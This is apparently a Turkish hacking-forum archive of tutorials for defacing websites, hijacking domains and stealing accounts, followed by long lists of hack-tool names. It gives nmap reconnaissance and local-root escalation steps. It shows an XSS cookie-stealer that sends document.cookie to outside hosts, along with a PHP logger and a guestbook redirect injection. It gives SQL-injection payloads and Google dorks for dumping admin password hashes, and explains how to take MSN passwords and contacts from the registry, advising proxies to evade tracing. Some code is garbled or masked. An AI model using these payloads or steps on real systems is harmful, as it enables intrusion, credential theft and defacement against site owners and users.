Archive for + + Web – Domain Hack

iNDeX aTMa aCıKLaMaLı aNLaTım Buyrun ;)

ÖNEMLİ TCP PORT NUMARALARI VE GÖREVLERİ

7 => echo, Bu porttan sunucuya ne yollarsanız aynen geri yollar.
9 => discard, Dev/Null.
11 => systat, Kullanıcılar hakkında bilgiler verir.
13 => daytime, Tarih ve zaman bilgisi. Bilgisayarın nerede oldu u bulunabilir.
15 => netstat, Network ile ilgili bilgiler.
19 => chargen, Sistemde kullanılan ASCII karakterler.
21 => ftp, Bildi iniz ftp portu.
23 => telnet, Telnet portu.
25 => smtp, Smtp (Simple Mail Transfer Protocol) Server portu.
37 => time, Zaman.
39 => rlp, Resource Location.
43 => whois, Host hakkında bilgiler.
53 => dns, Domain name server.
79 => finger, Kullanıcılar hakkında bilgi.
80 => http, Web sunucu.
110 => pop, Gelen mail.
119 => nntp, News Group.
443 => shttp, Güvenli web sunucu.
Bize gerekli olacak önemli portlar bunlar bu yüzden size liste hazırladım. Şimdi asıl işimize geçelim. Hack yaparken bize elbette bazı programlar lazım olacak bunları sizlerle kısa açıklamalar yaparak paylaşaca ım.

İlk olarak www.insecure.org/nmap adresinden NMAP programını indielim.Sitede programın windows ve Linux için ayrı versiyonları mevcut size uygun olanını listeden seçip download edebilirsiniz.Bu program bizi port tarama derdinden kurtaran harika bir programdır.Mantı ını açıklamak gerekirse şöyle diyebilirim: Hostun veri giriş çıkışı yaptı ı, sık kullanılan portları ve bu portlar üzerinde veri giriş çıkışı yapan programların bir listesini bize sıralayan bir programdır.Biz bu portlar üzerinde çalışan bir programın açı ını kullanıp sisteme sızabiliriz.E er hostun kullandı ı sistem Windows ise Administrator, Linux ise Root olabiliriz.Administrator ve Root bir sistemdeki en yetkili kişidir.
İkinci programımız ise NESSUS. Bu programın kullanımı zordur. Kullandıkça tecrübe kazanırsınız.Programın çalışma mantı ı şöyle: NASL (Nessus Attack Scripting Language) dili ile özel script saldırıları yapmaya yarar.Bize önemli güvenlik açıklarını bularak gösterir.Programı; www.oxid.it adresinden indirebilirsiniz.
Üçüncü programımız da ço unuzun adını duydu u JOHN THE RIPPER adlı Md5 cracker.Bu programla criptolu şifreleri (Md5-base 64) çözebiliriz. Bu tip şifreler sıklıkla forum database lerinde bulunur örne in “aeH19a85ZlokBN68A6d51mmT5e808aa2w03aVkuz4 ” şeklindeki bir md5 şifreyi çözebiliriz. Md5 şifrleme phpbb, vbulletin, phpnuke tarzı forum ve portalların database inde user tablosu içindeki listede kullanıcı adına karşılık gelen criptolu şifredir.John dışında daha pek çok md5 cracker mevcut fakat en ünlüsü ve hızlısı bu oldu u için bunu seçtim.John kırdı ı şifreleri Programı kurdu unuz dizinde “pass.txt” adında birmetin dosyası oluşturur. Şifreleri bu dosyadan alabilirsiniz.
Bunların dışında önemli bir yöntem olarak siteye ftp, telnet, ssh (shell) gibi yollarla ba lanmayı deneyerek sistemin kullandı ı programları ö renmektir.Arkadaşlar sizlere önemli bir tavsiyem kesinlikle denemekten kaçınmamanız deneme yanılma yöntemiyle ö renilen her şey çok daha kalıcı oluyor.43 saat süren hack deneyimlerim oldu.Şunuda unutmayın hiç bir sistem %100 güvenli de ildir, mutlaka bir açık mevcuttur. İşte o açı ı bulmak bizim görevimiz. Bu arada kendi güvenli iniz için sabit bir ip numarası kullanmaktan kaçının.Unutmayınki ip adresi sizin açık bir kimli inizdir. Sürekli de işen yada size ait olmayan ip adresleri kullanın. Bunun için ise Proxy dedi imiz sistemler vardır. www.atomintersoft.com bunlardan birisi. Sizde Google da proxy aratarak bulabilirsiniz. Bunu dışında sürekli ip Steganos Internet Anonymous programı yada Permeo Security Driver programını kullanabilirsiniz.
Host hakkında detaylı bilgi alabilece imiz di er yöntemler ise bir dos komutu olan ve hepimizin makinelerinde bulunan küçük progr****klar yani: finger ve tracert.
FINGER => Bize ilgili host üzerindeki kullanıcıları ve izin verilmişse bu kullanıcıların host üzerindeki özelliklerini verir.Tabiki bunu yapmak için öncelikle bilgi almak istedi imiz hosta 79. porttan yani finger portundan telnet ba lantısı yapıyoruz tabi açıksa. Bunun içinde Çalıştıra “telnet” yazıyoruz, ba lan kısmına “host adını” ba lantı türü kısmınada “79″ yazıyoruz.
TRACERT => Bu komut ise bize hosta gönderdi imiz paketin kaç yol geçerek hosta ulaştı ı hakkında bilgi verir ve routerları listeler.Buraya kadar yaptı ımız ön çalışma hostun haritalanması ve gerkli bilgilerin toplanmasıydı. Bundan sonrası sabır isteyen kısım.
Gelin şimdi ***** bir saldırı yapalım: Mezarcı acıklaması
Örnek olarak www.abcdefg.com diye bir site oldu unu varsayalım. Şimdi site hakkında bilgi toplamak için www.whois.sc sitesine kayıt olalım. Daha sonra Domain Explorer bölümüne geçelim www.adbdefg.com yazalım. Karşımıza bazı bilgiler çıktı, bunlar host bilgileri. Bize lazım olanlar: Reverse ip, Server type, Ip adress, Name server, ICAAN Registrar. Bu bilgileri alarak bir kenara not edelim. Şimdi kısaca üstteki bilgilerin anlamlarını açıklayayım.
REVERSE IP => Bu seçenek server üzerinde çalışan di er siteleride gösterir fakat whois.sc bize sadece 3 site görme hakkı vermektedir. E er silver üye olursanız tüm siteleri görebilirsiniz. Bu seçenek bizim için önemlidir çünkü; server üzerinde hacklemek istedi imiz www.abcdefg.com sitesi üzerinde açık yok diyelim, fakat server üzerinde çalışan başka bir sitede açık bulduk ve sitenin açı ı çok, bu sitenin ftp sine erişip gerekli kodları atabilirsek serveri komple ele geçirebiliriz!!!!! Yani root yada administrator olabiliriz.
SERVER TYPE => Server tipi bizim baz aldı ımız nokta olmalıdır. Mesela www.abcdefg.com sitesi için server tipi Apache / 1.3.31(Unix). Burdan anlayaca ınız şey: Server 80. porttan Apache 1.3.31 http serveri çalıştırıyor. Ayrıca PHP / 4.3.5 kullanıyor. Bunlar Daemon dedi imiz arka planda çalışıp serverin asıl aktivitesini yerine getiren yapılardır. İşte Exploitler yardımıyla server üzerinde kullanılan daemon veya http serverin bir açı ından içeri sızabiliriz. Şimdi adı bu kadar çok geçmişken Exploitler hakkında bilgiler vermek istiyorum: Exploitler sistemin açı ı üzerine yazılmış kodlardır. İçerik olarak include ve define edilmiş de işik kod kümeleri barındırırlar.Bu kodlar bizim uzun uzun u raşmamıza gerek bırakmadan bir şekilde servera gerekli komutları verdirererek çalışırlar. Exploitler root ve local olmak üzere ikiye ayrılır.
NAME SERVER => Burda yazan adres www.abcdefg.com için host sa layan sitedir. Bu adrese girerek server hakkında daha çok bilgiye ulaşabiliriz. Çünkü ; ço u host firması sitelerinde, kullandıkları makinenin özelliklerini ve üzerinde kurulu olan işletim sistemlerini, php versiyonlarını falan açıklarlar.

ICAAN REGISTRAR => Domainin kayıt edildi i site. Registrarı yani domain bilgilerini inceledi imizde bizim için önemli olan Administrative Contact yani domainin kayıtlı oldu u mail adresidir. Birde domainin kayıt edildi i registered through bölümündeki adrestir. Yani www.abcdefg.com domaini Registered through bölümünde yazan adres vasıtasıyla alınmış demektir. Şimdi bu bilgileri örne in Administrative Contact bölümündeki maili hacklersek domaini ele geçirebiliriz. Sonrada domaini kendi hostumuza yönlendiririz. Zaten domain bizim olmuş olur artık.
Şimdi uygulama kısmına geçelim: NMAP ı açıp nmap A-P0 www.abcdefg.com yazdık. Nmap sS şeklinde bir komut verebilmemiz için sitede bir firewall olmaması gerekir. Bu arada serverin tam olarak ne oldu unuda anlamış olduk: Redhat / Gnu Linux i386 üzerinde Apache 1.3.31(Unix) Web Server. Çıkan listedeki open yazan portlar açık, closed yazan portlar ise kapalıdır. Sistemde açık bir port yakalarsak hemen telnet ip adresi ve port numarası şeklinde bir dos komutu veriyoruz. Daha sonra telnet bizi serverda bir yere atar burdan sonra duruma göre hareket ederiz. Mesela bash shell e düşersek ID mize bakıp ona göre hareket ederiz. Root olmuşsak bu porta birisi daha önce erişmiş ve kullanıma açmış demektir. Ama local user isek local root exploitler ile sistemde root olmamız gerekiyor. Listedeki portlarla devam edelim: Bu portlar üzerinde çalışan programlardan herhangi biri üzerinde buldu umuz bir açık bizim sisteme girmemizi sa lar. Sisteme girdikten sonra root da olabiliriz. Peki bu programların açı ını nerden bilece iz diye sordunuz sanırım İşte bunun için açık olan portlardan birinin exploitini bulup derleyece iz. Sonrada exploit yardımıyla sisteme sızmaya çalışaca ız. Bundan sonrasında ise buldu umuz exploitin türüne göre ya root yada local kullanıcı oluruz. E er root olursak serveri istedi imiz gibi yönetiriz. Ama local isek yani shell e düşersek şunları yapabiliriz:
İlk olarak id yazarak kullanıcı durumumuzu ö reniriz. Genellikle apache yazar. Sonrada sistem yetkilerimize bakarız. Neler yapabiliyoruz, sisteme dosya yükleyebiliyormuyuz? Bunları hep deneriz. E er sisteme dosya çekebiliyorsak ve gcc compilerda çalışıyorsa o zaman uname a yazarak kernel çekirdek versiyonunu ö reniriz ve buna göre local root exploit ararız. Local root exploiti bulabilirsek sisteme çeker ve gcc ile derleriz. Daha sonra ise şunları yazarak root oluruz: ./exploit_adı . bunlarıda yapamıyorsak etc/passwd ve etc/shadow dizinlerine erişip erişemedi imizi kontrol ederiz. Bunların dışında mesela www.abcdefg.com sitesinin dizinini bulup içerisine index.html dosyası çekilebiliyormu siye deneyebiliriz. E er bunu başarırsak bu iş zaten bitmiştir, yani ilgili siteye index attık demektir. Ama root olduktan sonra serverda istedi imiz her şeyi yapabiliriz. Yani bütün sitelere index atıp, serveri da atabiliriz.

BBcode Kullarak Cookie Çalma

Oncelikle sıze bazı tanımlar yaparak ıse baslamak ıstıyorum.Bu yontemde sıze herhangı bır php forumda(phpbb , vbulletin vs…)nasıl admın gırısı yapacagınızı anlatacagım.Yontem gayet sıkı ve cogu sıtede ıse yaramaktadır.Sizden ricam bu yontemi ogrenırken sabırlı ve azımli davranmanızdır.

Simdi isimize bakalım bu yontem de esas olan sıteye admının cookie siyle girmektir.

Cookie:Ornegın sız santaj.org/sst ye(yani forumumuza) girdiniz.Eger siz gırerken benı hatırlayı ısaretlersenız bilgisayariniza sitenin bılgılerı gırılır ve siteyi actiginizda actıgınız oturumla devam edebilirsiniz.Kısacası cookiler web sayfanızı ziyaret eden ziyaretçilere sonraki girişlerinde tanımak için bırakılan metin dosyalarıdır.

1-> Peki bize cookieler ne gıbı bır faydası olacak?

Eger adminin cookiesini calabilirsek onun kıyle sıteye gırer ve siteyi hackleyebiliriz.

2->Peki yontemi nasıl uygulayacagız?

Genellikle php forumlarda gıbı resım koyma tagı vardır.Sımdı bız bunu ımg taqı ıcınde [hide]http://antichat.ru/cgi-bin/s.jpg[/hide] bu resmi çağırırsanız o konuya giren herkesin cookie bilgisi [hide]http://antichat.ru/sniff/log.php[/hide] adresinde loglanıcaktır.

Aslında olay bu kadar basıt bunun daha gelismisleride var dir ama sımdılık cok fazla sıtee ub acık mevcut oldugu ıcın onlara degınmıyorum.

3->Peki CeMeTeRY abı sen ıyı guzel anlatmıssın da antichat bu ısı nasıl yapıor yanı resme code fln mı eklıor?Cok mu zor?

Bunun cevabı ıse gayet basıttır arkdaslar ve o kadar kolaydır kı sız bıle aa dersenız yanı.Eger daha onceden IIS veya Apache deneyımı olanalr ıcın bu uygulamayı yapmak cok kolay olabılır ama ben genede genıs bır anlatım yapayım bunada.Ben serverınıze IIS veya Apache kurdugunuzu varsaYasak Kelime ıslemlere baslıyorum.

Apache kuranlar icin;

Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını buluyorsunuz ve sonuna .jpg ekleyıniz.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz

ISS ıcın ;

Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazınız.Bu ıslemele IIS de .jpg ye uzantıya php emrini vermis oldunuz.

Daha sonra yenı bır metin belgesi aciniz

******************.********=&񗝉http://www.site.com/log.php?&񗝉+escape(********.cookie)</script> yazarak atıyoruz cemetery.jpg olarak farklı kaydetmek ondan sonra bu dosyayı jpg uzantısını php nin emrine verdiğiniz server daki bir siteye atıp admin cookie çalmak istediğiniz siteye bu bbcode arasında çağırmaktır.

Kod:
<?php

$kayit = fopen(“ekledik.txt”,”a”);

foreach($_GET as $variable => $value) {
**********
img = new Image(); img.src =
http://www.g3n3t1x.org/sniff/s.gif?“+********.cookie;
</script>
fwrite($kayit,$variable . “: ” . $value . “\n”);

}

fwrite($kayit,”—————————\n”);

fclose($kayit);

mail(” mailadresiniz@mail.com,Şifre Geldi uleeee “,”:

Taze_Kek@geldi.com&&#358217[IMG]…ilies/wink.gif[/IMG];

?>

Arkadaslar bu yontemi gelistirmek birazcık ta size kalmıs bır sey eger bu yontemi iyice kavramak istiyorsaniz IIS veya Apache mutlaka kurun derim.

Powered By Smoothflash Açığı

Dork1 : “Powered by Smoothflash”

Dork 2 : allinurl: “admin_view_image.php”

Exploit :
admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users

Google için Hack Kodları

Bende olan hack programları
vbulletin 3.5.4 a
domain hack hakkında herşey
hacked_kingin eklediklerinin dewamii
Author A
Flashget ‘ Le Hack!
CGI aciklariyla Hack
Son surum turkce 1.6 rc57 listhpath
Whois Bilgisi Almak
mk portal ana sayfayasina zarar vermek
garantili!!!….sitenin bilgileri an
garantili!!!….sitenin bilgileri an
Web Chat Hackleme
vbulletin shotbox açığı
index atma çeşitleri
Müthiş bi fso bu:!
Siteye admin olarak girip index basmak
GavurSavar Public Version -Beta1
vbulletinin hackleniş anı (adam videoya çekmiş)
WEB site göçöertme programı
Yeni Bİr Acık Buldum.
Acemi Hackerlar İ
Sİnİr Olduqunuz Cafelerİ U
Site Hackleme Full Resimli
Paralı siteleri beleşe getirme kolay ve %95 garanti
Bunları Bilmeden Hackerım Demeyin
Web Sitesi KaPatMak
somee.com hack
Kolay Anlatım Asp hacking SQL INJECTION
index
Web Sayfasına Trajen yerleştirme
*-*Php Fucker*-*
NStealth Acik Tarayici (Süper Birşey )
2 Dk De Web Hack [Resimli Anlatim]
PhpBB Forumlarda Cookie Acigi
Site Hackleme Full Resimli Anlatım By Admin
Acık Bulucu
Yenİ Baslayanlara GenIs Hacking Anlatimi // 1. Bolum
..:: Web Hacking dokuman.
Yenİ BaŞlayanlara GenİŞ Hacking Anlatimi // 2. B
Vb shoutbox acıgı
Daha Hic hack yapamadım diyenler buraya [cok kolay herkes yapicak]
Mynet Fakesi Sizlerle Birlikte [By Admin]
Sec begen al 650 tane index
Web Hack Yapmk İcin Size Bir Harita Lazim [By Addmin]
170 Tane Hack Videosu
SQL Injection in qliteNews
Web Sitesi Cokertme %100 sONUC
File İncludes A
Php-Nuke Arama Blok Acıgi
.:: % 100 Web Hack ( Davs DegiL ) ::.
Arkadaslar sizlere AntiRus 3.0 sunmak Istiyorum
CGI acıgı
Super Hack Yontemi Anlatımı ….
ip ve Sifre kırıcı ile Webhack
HACK dokumanları dev arsiv!!!
Program Kullanmadan İstediginiz Web Sitesini Bloklayın!!
Resimli Phpbb Hack Kesin Yaparsınız Artık
seslı chat hack
Muthİs Bİ WebHack Programı
bır sıtede olabılecek tum acıklar
Site dondurmanın en kısa yolu… ))
Forumlarda Sifre Bulma Yolu
Cok Kolay Web Hack
Ftp Hack Cok Kolay
Admİn Panelİnİ Ele Gecİrme
<<< Google’dan Hack İşlemi >>>
siteye Uye kullanıcılarının Sifrelerini Calmak
İsrail’e Darbe | 1*400 Uzerinde İsrail Sitesi Hacked
google ın verdigi acıklar
UltraAPPS Portal Hack
phpBB forumlarında admin seviyesine ulas
site hacklemeyen g
YellDL Hack
Elmalı Şeker
GeneL saldiri t
Garantili web hack %100 (ISS acigi)
Ftp hack (ISS)
Web sitesine trojen sokma
Bunlari bilmeden Hackerim demeyin..
Bu acigi bilen site hackler kesin
VBulletin ImpEx 1.74 RFI
vBullletinin g
forum forum*site hacklemenin baska yolu
Yok Bole Bi Webhack Programlar!
Kullanimi Basit Bi Web Hackleyicisi Siteyi 2 Dk Dondurur
program siteye fazla yuklenerek cokertir..
Perl_Realise_Sql_Exploit (VİDEOLU)
siberalem gold uyelik
Admin Sifresi Kırmanın En Kolay Yolu….
Acıgı BUl İndex’ini At
Google komutları buyurun arkadaslar
Modemlerde port acmak
xoops acigi
Asp Sql icin Kodlar
Web Hack Taktik ve Programlari
Muthis Bir FSO Bu.!
..::web Hack Hakkinda Hersey::..
Vbulletin Tum Surumunde Basitce Bir Hack
Hacker olmanın ilk Sartı dos komutları…
Hackers Toolkit Suite 2006
Xxx Cr@cking Toolkit Suite Aio
php hacklemenin yöntemi bitmez
WebChat Sitesi calmaaa ) ( Kolay )
israilin lubnan saldırılarına sessiz kalmadık birlesmis millletler sitesi hacklendi
:::site acigi tarama programi begenirsiniz umarim
Cok Basit Bir Yontem Herkes Yapabilir !
Sprut la saldirin.
Md 5 Cracker Kullanımı ( Videolu )
3 Kişiyle Saldır İstedgin Siteyi Cokert
UnlU TUrk Hacker İspokorpİtx’İ Bulup ROportaj Yaptilar
iskorpitx abimizden SQL a
Ufak Ama İşe Yarar Web Saldiri Programı..
30 Agustuos’da Pkk.Org’u Yıkmak İcin 5 Program !
Siteye Uye Kullanıcılarının Şifrelerini Calmak
vBulletin’de Buyuk Acık ( Top-X ‘Lere Dikkat !! )
Phpbb sitelerine eskiden bu kodla hack yapılıyodu
Arşivimden Cıkardım Herkese Lazım!!!(Acces Şifre Kırıcı Veri Tabanları İcin..)
iManage CMS`de Guvenlik Acıgı !
SiteDepth CMS`de Guvenlik Acıgı!
TURKCELL Super Şifreleri Hackleme
MD5 şifreleme
WFTPD Server / Pro Server guvenlik Acıgı
vBulletin’de Buyuk Acık / Top-x Caresi Bulundu !!!
Tagger LE File Include By St@rExT
Avatardan Cookie Calmak By St@rExT
Linux Server Root
Windows server root
BanLanaN Bir SiteDen NasIl TekRar UyeLik AlaBilirim
Kredi kartsız olarak sitelere giriş
Domain Hack!!
.mynet.com hacked …hacked by …….. herkes yapsın
Forum sitelerinin hacklenmesi
smileygenerator.us nasıl hacklandi video By St@rExT
PHP Injektiyon [rfi] Dokuman By St@rExT
EQdkp 1.3.0 c99shell
inndir.com a index basma şaka felan deil!!
Avatara Code saklayarak index basma!
fso lar ve php sheller hepsi bir arada
Config.php ile Web hack (Video anlatımda mevcut)
MuthİŞ Bİ WebHack Programı
İndex Atmak İcin HTML Baglari
Google’den Hack
Site hacklemenın en kolay yolu …
Hack Paketi ( Hepsi Bir Arada10.9 MB )
Web Hack* Web Deface* Host Hack Ve Guvenlik Yontemleri Anlatımı
Powered by Web Wiz Site News version 3.06 A
Remote Exploit / C. Perl. Derleme
$250 dolarlık Script St@rExT ve Tarafından Orjinalen Ftp den İndirildi
Hackers Toolkit Suite 2006
Paypal Hacking tool (100 % working) new
31 Hacking/Exploit Ebooks – Download now* Hack later!!!
ŞooooKKK GoogLe Scripti eLimde By -BL4CKF!RE-
Google Da YEni bir BUluşum

Hack Programları :D Doya Doya Kullanın

CrackersKit 2005
Golden eye 2005
HellLabs Proxy Checker v7.4.18
HostScan v1.6.5.531
Invisible Browsing v4.0
IPScanner v1.86
Ascii Factory 0.6
Cool Beans NFO Creator v2.0.1.3
Dizzy v1.10
Feuer’s NFO File Maker v2.0
Ims NFO&DIZ Maker 1.87
Inserter v1.12
NFO Creator v3.5.2
NFO Maker 1.0
Patchs All In One 2005
SoftIce 4.05 -Win 2000-XP
IP Address Scanner
IP Calculator
IP Converter
Port Listener
Port Scanner April 2005
Ping
NetStat 2005
Cool Trace Route 2005
TCP/IP Configuration
Online – Offline Checker
Resolve Host & IP
Time Sync
Whois & MX Lookup
Connect0r
Connection Analysator and prtotector
Net Sender April 2005
E-mail seeker
Cool Net Pager
Active and Passive port scanner
Spoofer
Hack Trapper
HTTP flooder (DoS)
Mass Website Visiter
Advanced Port Scanner
Trojan Hunter Multi IP April 2005
Port Connecter Tool
Advanced Spoofer
Cool Advanced Anonymous E-mailer April 2005
Simple Anonymous E-mailer
Anonymous E-mailer with Attachment Support
Mass E-mailer
E-mail Bomber
E-mail Spoofer
Simple Port Scanner (fast)
Advanced Netstat Monitoring
X Pinger
Web Page Scanner
Cool Fast Port Scanner
Deep Port Scanner
Fastest Host Scanner (UDP)
Get Header
Open Port Scanner
Multi Port Scanner
HTTP scanner (Open port 80 subnet scanner)
Multi Ping for Cisco Routers
TCP Packet Sniffer
UDP flooder
Cool Resolve and Ping
Multi IP ping
File Dependency Sniffer
EXE-joiner
Encrypter
Advanced Encryption
File Difference Engine
File Comparasion
Mass File Renamer
Add Bytes to EXE
Cool Variable Encryption
Simple File Encryption
ASCII to Binary
Enigma
Password Unmasker
Credit Card Number Validate and generate
Create Local HTTP Server
eXtreme UDP Flooder
Web Server Scanner
Force Reboot
Cool Webpage Info Seeker
Bouncer
Advanced Packet Sniffer
IRC server creater
Connection Tester
Fake Mail Sender
Bandwidth Monitor
Remote Desktop Protocol Scanner
MX Query
Messenger Packet Sniffer
Cool API Spy
DHCP Restart
File Merger
E-mail Extractor (crawler / harvester bot)
Open FTP Scanner
Fast Patch
Predator’s Extreme Loader Generator 0.3
Srlzer – Patch generator
Yoda’s Process Patcher
Buddha Patch File Creator 2.2
CodeFusion
Cool Beans NFO Creator 2.0.1 build 3
Patch Creation Wizard v1.2
Patch On The Fly v0.75
Rlzer
RTD – WINpatch v1.0
Tola’s Patching Engine

hepsini burdan indirin: http://stu.inonu.edu.tr/~ncirakoglu/hackprogram.htm

rusların hack yöntemleri !!!

Senaryo-Gerçek 0lay?

Son günlerde bazi RUS hackerlar aldiklari kararla toplu MSN hack yapmaya başladilar….! HAtta bazı arkaslarimiz aynen anlattığına göre birileri MSN listlerine giriyor ,ufak konusmadan sonra herif msn list ini makinasinin IP sini soyluyor bizimkileri tehdit edip sifresini kırıyor we ayriliyor….! Üstüne üstlük bu olaylar sadece 2-3 dakika içinde oluyor…!Arkdaslarin söylediklerine görede ne fake mail v.s. gibi birsey gelmis nede dosya paylasimi yapmislar………..!!!!!

Böyle BirSey Olabilir Mi?

Her zaman dediğim gibi “impossible is nothing” in yaninda bir arastirma yaptim…!Burdaki göreceginiz ögreneginiz seyler aslinda yarimyamak bildiginiz ama önemsemediğiniz seylerden birisi…! Hadi başlayalim :~)

Ruslari Taniyalim?

Rus lari bilirsiniz Cyber bazinda hepsi ii birer uygulamacidir “söze dikkat!” sadece uygulamaci yani Script Kiddie kisacasi lamerdirler…!Kısacasi acigi ögrenip 1000 de 1 ihtimalde olsa uygularlar…!Onların bu özelliğini daha ii özetlemek gerekirse Bolu dagindan gecen İstanbul otabının yapimi öncesi (hani su İst-Ank 3 saaate indirecek yol) Bizmkiler nerdeyse vazgecek iken ,disaridan Rus we Ukrayna li mühendisler getirtmisler we inceletmisler Bolu dagini yarip otoyol olusturmak gercekten zordu ama inkansiz degildi bir rus mühendis in sözü “1 mm de ilerleyemiyor mu?” kisacasi onlarin uygulamaci karakterlerini anlatiyor…!
Bilgisayar ortaminda da Vlademir Levin in Citibank tan 1998 yıllarinda 10.000.000$ üzerinde bu hipotezi daha da güçlendiriyooo…!!! Neyse bende amma cok geyiq yaptim konuya gecelim dagitmadan!!!!!

Olayi kurgulayalim?

Bu olayı duyduktan sonra biraz arastirma yaptim…!Nasıl olabilir di ki……! HerkeZ windows ortamindaydi ama farkli farkli isletim sürümlerini kullaniyorlardi…!!!Kisacasi sistemin aciklarini sömürmeleri biraz zordu….!!!Ya MSN acigi yada bu platformlarin ortak aciklari olmaliydi….!!!
Msn de kiselerin listemizde olmasi we karsilikli konumamiz bile yeteri kadar acik oldugunu yazimizda görecegiz…!

0lay?

1E -postalarimizi bulmalari: Ruslar cesitli msn profilllerimizin kayıtlı oldugu msn sayfalari yada aram motoralrindan e posta adreslerimizi buluyorlardi…Bu cok kolay bi is 12-13 yasindaki bebeler bile yapar :~)
2.IP lerimizi ögrenmeleri:Bizim rus lamer listeye girdikten sonra ip mizi cmd den netstat -n cekip yada netstat -na (tü baglantilari portlarla listeler) yada daha acisibaglantilari dinleyen lamer tool lerle hallediyordu…
2.a Eğer bir proxy yada wingate v.s. kullaniyosak ip izi bulamayacaktir.Bunun için ya dosya gönderecek (o zaman direkt ip yi görür) yada ip izi descripte etmeye calisacaktir..Kimimiz msn proxy tool leri kullaniyoruz ki bendeki bile ispanyolca bağlanti için é-cafe tercih edersem tamamen korumasizim..1 :~)

3.Sifremizi Kırmasi:İste en önemlisi herkezin sifresi registriy de Hkey_Current_UserSoftwareMicrosoftMessengerServ icePasswordMSN Messenger Service anahtari altinda saklanir ama encrypte edilmistir yani cözülmeden okunamaz……..!Bunun için http://newdata.box.sk/2001/jan/win/MSDecripter.exe gibi bir program ile sifrenin okunmaz halini kendi bilgisayarinda cozecektir.Yada bazi sitelerde msnpwd.cgi lerde hash koyup eger önceden eklenmisse 30 sn içinde sifreyi okur…! Ewet ewet artik md5 i bile bu tür sitelerde bulabiliriz…!

4.Listemizi okumasi:Bizim lamer eğer listemize girmisze kendi bilgisayarinda ’HKEY_CURRENT_USERSoftwareMicrosoftMessengerS er viceListCache.NET Messenger Service’ bu anahtara gidip kendi kontak kurdugu kubanin(bizikiler) nick ine tıklar yine encripte edilmistir ama cift tıkladiginda herifin kurbaninin tüm engelli izinli kisi listesini görür…! Sasirmayin ne oldu!!!! Bu bi arkasainizin üzerinde deniyebilrsiniz….!
5.Tel No Listesini Almak:Eger herif yeni ortaya cikan msn 7.0 acigi yada Netbios gibi paylasimlar la sizin bilgisayariniza girebilirse Regedit ten Ağ kaydina Bağlan a tıklayıp sizin pc nin İp sini yazar yine ’HKEY_CURRENT_USERSoftwareMicrosoftMessengerS er viceListCache.NET Messenger Service’ anahtara gelip sizin
PHH (home telephone number) Ev telefon nosu
PHM (mobile telephone number) Cep telefonu nosu
PHW (work telephone number) İş telefonu nosu gibi kisi listesini ekleme özelliklerini kullaniyosaniz bilgileri ele gecirebilir…!
6.MsN List: Konuyla ilgili degil ama size bilgisayarimizdaki Msn i kimlerin kullandigi ile ilgili listenin nerde kayit edildigini wermek istedim.Hkey_Current_UserSoftwareMicrosoftMessenge rServ iceListCache.Net Messenger Service
7.Net ve Network Pass:Haa bu arada yeri gelmiskende soylemeden gecemedim WinXP de .NET(msn in işletim sistemine login için ilişkilendirilmis hali) we Network Pass lari ilk login den sonra hafizaya alir ve Documents and Settings<User Name>Application DataMicrosoftCredentials<User SID>. altinda saklar.Bazi arkadaşlarin kullandigi IM Pass Recovery yada Network Pasword Recovery gibi programlar bu anahtari yoklayip bulurlar…!(Bilrisiniz Cached olayiii)

DikkaT: Ben burda bildigim %100 calisan acikla nasil MsN saldirisi yapilacagini anlattim.Burada her sistemde olan aciklara deyindim…!Özellikle MsN sürümleri we diger aciklara deyinmedim

kolay site hack

ziyaretçi defteri olan sitelere  mesajınıza aşağıdaki kodu ekleyin

Code: <meta http-equiv=”refresh” content=”0;URL=http://www.hemrack.com/emre.html”&g
t;

Kolay Hack -1

size burda benim bildigim en kolay site hacki nasil olur onu anlaticam Umarim Begnirsiniz.

Ilk önce bir arama makinasi acin www.google.de yada www.yahoo.com veya benzeri

simdi arama yerine bunu kopyalayin include.php?path=forum/team.php
ve aramaya basin,
Bastiktan sonra en son sayfaya gidin mesela 52 sayfa mi buldu 52 inci sayfaya gidin.

demek istedigim en sondan en basa dogru denemekle basliyoruz.

Simdi Baslayalim

girdiginiz sayfada /include baslayan yerden itibaren silmeye basliyorsunuz
ve onun yerine arkasina bunu yapistiriyorsunuz:

/include.php?path=faq/faq.php&catid=-1\\\\\\\’%20UNION%20SELECT%201,2,3,4,user_name,use r_pw,7,8,9,10,11,12,13%20FROM%20phpkit_user%20wher e%20%20user_id=1%20and%20\\\\\\\’1\\\\\\\’=\\\\\\\ ’1

mesela örnek
böyle olucak

http://www.xxxxxxxx.com/include.php?path=faq/faq.php&catid=-1\\\\\\\’%20UNION%20SELECT%201,2,3,4,user_name,use r_pw,7,8,9,10,11,12,13%20FROM%20phpkit_user%20wher e%20%20user_id=1%20and%20\\\\\\\’1\\\\\\\’=\\\\\\\ ’1
entera basdiktan sonra kariniza bir sayfa cikicak

orda yazan isim kullanici ismi oluyor en cogunda Admin yazar yane Admin kullanici ismi olarak kullanilicak baska bir sey yazarsa baskasi kullinlicak.

ismin altindada rakamlar yazili örnek
e59e34296cbe231f485658e5e3653f7a

simdi bu rakamlari kopyalayip
bu sitede cracklemeye calisicagiz sitenin adresi http://gdataonline.com/seekhash.php

yukardaki site cracklemeyi basaramassa bir baska site de denicegiz sitenin adressi
http://milw0rm.com/cracker/insert.php

cracklemeyi basardiktan sonra güvenlik kodu elinizde olmus oluyor

bu nick le yani simdi giris yapabilirsiniz siteye

Nick: xxxx Kod: xxxx

ve ayarlari degistirebilirsiniz umarim yardimci olabildim sorusu olan mesaj atabilir.
yanliz bunuda söylemek lazim her sitede olmuyor ama %70 oluyor denemeniz lazim güvenlik sisteminde aralik olan sitelerde yüzde yüz calisiyor

 

BAşaarılar Dilerim

Saygılarımla…

BL4CKF!RE

Hacker Yetiştirme

sa arkadaşlar size hack ile ilgili soracağınız herşeyi (örn. site nasıl hacklenir,msn nasıl patlatılır hepspni size bir bir anlatabilirim ve ayrıca deneyimli uzmanlar tarafından haker yetiştirilir.

gerekli bilgi için

hackermami@hotmail.com  yeterlidir…

Firefox ile üye olamdan sitelre girin

